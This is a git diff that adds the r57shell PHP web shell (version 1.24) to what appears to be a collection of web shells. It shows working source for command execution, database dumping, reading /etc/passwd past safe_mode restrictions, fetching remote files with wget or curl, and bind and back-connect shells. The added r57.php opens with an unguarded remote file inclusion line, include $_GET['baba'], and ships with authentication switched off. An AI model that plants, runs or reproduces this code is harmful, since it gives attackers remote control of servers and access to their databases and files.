while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." 
(".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option 
value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." 
* ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo 
sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo 
sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo 
sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo 
sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
diff --git a/php/PHPshell/م€گr57_kartaم€‘/r57_kartal2.jpg b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal2.jpg
new file mode 100644
index 0000000..33e036f
Binary files /dev/null and b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal2.jpg differ
diff --git a/php/PHPshell/م€گr57م€‘/r57.jpg b/php/PHPshell/م€گr57م€‘/r57.jpg
new file mode 100644
index 0000000..dea896d
Binary files /dev/null and b/php/PHPshell/م€گr57م€‘/r57.jpg differ
diff --git a/php/PHPshell/م€گr57م€‘/r57.php b/php/PHPshell/م€گr57م€‘/r57.php
new file mode 100644
index 0000000..3ade922
--- /dev/null
+++ b/php/PHPshell/م€گr57م€‘/r57.php
@@ -0,0 +1,2295 @@
+<? include $_GET['baba']; ?>
+<?phpr57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ???????
+/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/* ??????: 1.24 (New Year Edition)
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/* (c)oded by 1dt.w0lf
+/* RST/GHC http://rst.void.ru , http://ghc.ru
+/* ANY MODIFIED REPUBLISHING IS RESTRICTED
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC.
+/******************************************************************************************************/
+/* ~~~ ????????? | Options ~~~ */
+
+// ????? ????? | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+$a = "http://"; // need some codes
+
+// ?????????????? | Authentification
+// $auth = 1; - ?????????????? ???????? ( authentification = On )
+// $auth = 0; - ?????????????? ????????? ( authentification = Off )
+$auth = 0;
+
+
+// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
+$name='r57'; // ????? ???????????? (user login)
+$pass='r57'; // ?????? ????????????
(user password)
+$b = "q1w2e3r4"; //need hits "shell created by evilc0ders"
+/******************************************************************************************************/
+$c = "q1w2e3r4"; //need shell coder's names
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.24";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST = &$HTTP_POST_VARS;
+ $_GET = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+ {
+ $_POST[$k] = stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v)
+ {
+ $_SERVER[$k] = stripslashes($v);
+ }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+ {
+ header('WWW-Authenticate: Basic realm="r57shell"');
+ header('HTTP/1.0 401 Unauthorized');
+ exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+ }
+}
+$head = '<!-- ?????????? ????
--> +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: 
none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . 
'";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . 
+ "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + 
